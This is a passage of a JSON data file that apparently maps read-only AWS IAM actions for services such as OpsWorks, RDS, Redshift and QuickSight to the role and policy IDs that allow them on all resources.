{"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"networkmanager:getLinkAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"networkmanager:getLinks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"networkmanager:getSites": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"networkmanager:getTransitGatewayRegistrations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks-cm:describeAccountAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks-cm:describeBackups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks-cm:describeEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks-cm:describeNodeAssociationStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks-cm:describeServers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeAgentVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeApps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeCommands": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeDeployments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeEcsClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeElasticIps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeElasticLoadBalancers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeLayers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeLoadBasedAutoScaling": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeMyUserProfile": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describePermissions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeRaidArrays": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeRdsDbInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeServiceErrors": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeStackProvisioningParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeStackSummary": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeStacks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeTimeBasedAutoScaling": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeUserProfiles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:describeVolumes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"opsworks:getHostnameSuggestion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"outposts:getOutpost": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"outposts:getOutpostInstanceTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"outposts:listOutposts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"outposts:listSites": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeAlgorithm": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeCampaign": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeDataset": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeDatasetGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeDatasetImportJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeEventTracker": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeFeatureTransformation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeRecipe": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeSchema": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeSolution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:describeSolutionVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listCampaigns": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listDatasetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listDatasetImportJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listDatasets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listEventTrackers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listRecipes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listSchemas": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listSolutionVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"personalize:listSolutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"polly:describeVoices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"polly:getLexicon": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"polly:listLexicons": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"pricing:describeServices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"pricing:getAttributeValues": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"pricing:getProducts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:describeDashboard": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:describeDashboardPermissions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:describeGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:describeIAMPolicyAssignment": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:describeTemplate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:describeTemplateAlias": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:describeTemplatePermissions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:describeUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listDashboards": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listGroupMemberships": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listIAMPolicyAssignments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listIAMPolicyAssignmentsForUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listTemplateAliases": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listTemplateVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listTemplates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listUserGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"quicksight:listUsers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:Describe*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"rds:DescribeAccountAttributes": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeDBClusters": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeDBEngineVersions": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeDBInstances": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeDBParameterGroups": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeDBParameters": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeDBSecurityGroups": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeDBSnapshots": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeDBSubnetGroups": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeEngineDefaultParameters": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeEvents": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeOptionGroupOptions": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeOptionGroups": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeOrderableDBInstanceOptions": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeReservedDBInstances": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:DescribeReservedDBInstancesOfferings": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:ListTagsForResource": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"rds:describeAccountAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeCertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBClusterParameterGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBClusterParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBClusterSnapshots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBEngineVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBParameterGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBSecurityGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBSnapshotAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBSnapshots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeDBSubnetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeEngineDefaultClusterParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeEngineDefaultParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeEventCategories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeEventSubscriptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeOptionGroupOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeOptionGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeOrderableDBInstanceOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describePendingMaintenanceActions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeReservedDBInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:describeReservedDBInstancesOfferings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rds:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:DescribeClusters": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"redshift:DescribeReservedNodeOfferings": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"redshift:DescribeReservedNodes": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"redshift:describeClusterParameterGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeClusterParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeClusterSecurityGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeClusterSnapshots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeClusterSubnetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeClusterVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeDefaultClusterParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeEventCategories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeEventSubscriptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeHsmClientCertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeHsmConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeLoggingStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeOrderableClusterOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeReservedNodeOfferings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeReservedNodes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeResize": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeSnapshotCopyGrants": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeStorage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeTableRestoreStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"redshift:describeTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rekognition:listCollections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"rekognition:listFaces": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"resource-groups:getGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": 